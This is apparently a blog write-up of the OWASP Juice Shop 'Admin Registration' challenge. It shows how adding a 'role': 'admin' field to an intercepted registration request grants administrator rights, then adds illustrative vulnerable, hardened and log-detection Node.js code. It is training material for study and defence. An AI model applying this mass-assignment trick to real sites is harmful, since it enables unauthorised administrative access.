Challenge:
Name: Admin Registration
Description: Register as a user with administrator privileges.
Difficulty: 3 star
Category: Improper Input Validation
Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html
Tools used:
Burp, FoxyProxy
Resources used:
Methodology:
In the expanded description, it’s recommended that I try registering as an ordinary user to see what API endpoints are involved, then to “Think of the simplest possible implementations of a distinction between regular users and administrators”.
After setting up Burp Suite and FoxyProxy and filling in the new user registration form, this is the request that is sent to the server.
![Burp Suite Repeater: the unmodified registration request, POST /api/Users/ to http://localhost:3000, with a JSON body containing email, password, passwordRepeat, securityQuestion (id 1, "Your eldest siblings middle name?", createdAt/updatedAt timestamps) and securityAnswer](https://curiositykillscolby.files.wordpress.com/2020/11/image-63.jpeg?w=488)
Fortunately, thanks to the user authentication details I gathered during the Admin Section challenge, I have a JSON document containing all of the database fields this form can populate.

Looking at the differences between the admin account and Jim’s account, it’s plain to see that the “role” field is the simplest way the application distinguishes customer accounts from administrator accounts. Adding a “role” field that identifies this user as an administrator to the outgoing registration request may therefore be sufficient to complete this challenge.
![Burp Suite Repeater: the same POST /api/Users/ registration request with a "role": "admin" field inserted into the JSON body after passwordRepeat, the remaining fields (email, password, securityQuestion, securityAnswer) unchanged](https://curiositykillscolby.files.wordpress.com/2020/11/image-61.jpeg?w=402)

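As an added illustration (not code from this write-up and not Juice Shop's own implementation), the following hypothetical Node.js registration logic shows why the extra field works and how the hole is closed. The vulnerable version spreads the client body into the new user record, so a client-supplied `role` overrides the server default; the hardened version allowlists the fields a client may set, rejects anything else, and assigns `role` server-side. The request body mirrors the captured request above, while the log line format and the `findPrivilegedFieldAttempts` helper are assumptions made for this example.

```javascript
// Added example, not Juice Shop code: a hypothetical in-memory registration
// handler that reproduces the mass-assignment behaviour observed on POST /api/Users/.

// Constructed request body modelled on the Burp screenshot, including the added "role".
const CONSTRUCTED_BODY = {
  email: 'test3@test.com',
  password: 'test1234',
  passwordRepeat: 'test1234',
  role: 'admin',
  securityQuestion: { id: 1, question: 'Your eldest siblings middle name?' },
  securityAnswer: 'Ferdinand Cunningham III',
};

// Vulnerable: every key in the request body is copied into the model, so the
// client's "role" silently replaces the default of "customer".
function registerVulnerable(body) {
  const user = { role: 'customer', ...body };
  delete user.passwordRepeat;
  return user;
}

// Hardened: only these keys may come from the client; everything else is rejected.
const CLIENT_FIELDS = ['email', 'password', 'passwordRepeat', 'securityQuestion', 'securityAnswer'];

function registerHardened(body) {
  const unexpected = Object.keys(body).filter((k) => !CLIENT_FIELDS.includes(k));
  if (unexpected.length > 0) {
    // Reject instead of dropping quietly so the attempt shows up in application logs.
    throw new Error(`Unexpected field(s) in registration: ${unexpected.join(', ')}`);
  }
  if (typeof body.email !== 'string' || body.password !== body.passwordRepeat) {
    throw new Error('Invalid registration payload');
  }
  return {
    email: body.email,
    password: body.password,
    securityQuestionId: body.securityQuestion ? body.securityQuestion.id : null,
    securityAnswer: body.securityAnswer,
    role: 'customer', // privileged attributes are never taken from the request
  };
}

// Detection side: scan (constructed, hypothetical-format) access log lines that
// record the JSON body of registration requests and flag privileged fields.
const PRIVILEGED_FIELDS = ['role', 'isAdmin'];
const CONSTRUCTED_LOG = [
  '2020-11-02T17:20:01.000Z POST /api/Users/ 201 {"email":"alice@example.com","password":"pw","passwordRepeat":"pw"}',
  '2020-11-02T17:22:49.988Z POST /api/Users/ 201 {"email":"test3@test.com","password":"test1234","passwordRepeat":"test1234","role":"admin"}',
  '2020-11-02T17:23:05.000Z GET /api/Users/ 200',
];

function findPrivilegedFieldAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    if (!line.includes('POST /api/Users/')) continue;
    const start = line.indexOf('{');
    if (start < 0) continue;
    let body;
    try {
      body = JSON.parse(line.slice(start));
    } catch (e) {
      continue; // malformed body, nothing to inspect
    }
    const fields = PRIVILEGED_FIELDS.filter((f) => Object.prototype.hasOwnProperty.call(body, f));
    if (fields.length > 0) hits.push({ email: body.email, fields });
  }
  return hits;
}

module.exports = { CONSTRUCTED_BODY, CONSTRUCTED_LOG, registerVulnerable, registerHardened, findPrivilegedFieldAttempts };
```

Running `registerVulnerable(CONSTRUCTED_BODY)` yields a record with `role: 'admin'`, while `registerHardened` throws on the same body and only accepts it once the unexpected field is gone, at which point the role is `customer` regardless of what the client sent. The same allowlist approach applies to any ORM-backed REST endpoint that binds request bodies directly to model attributes.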
Prevention and mitigation strategies:
Lessons Learned and Things Worth Mentioning:
- This is a perfect example of using previously gathered information to help craft an entirely new attack. Having the user authentication details saved from the Admin Section challenge made completing this challenge far faster and simpler. This is why I always take time in challenges to gather any extra data I come across and save it in a specific directory for future reference. You never know when stuff will come in handy.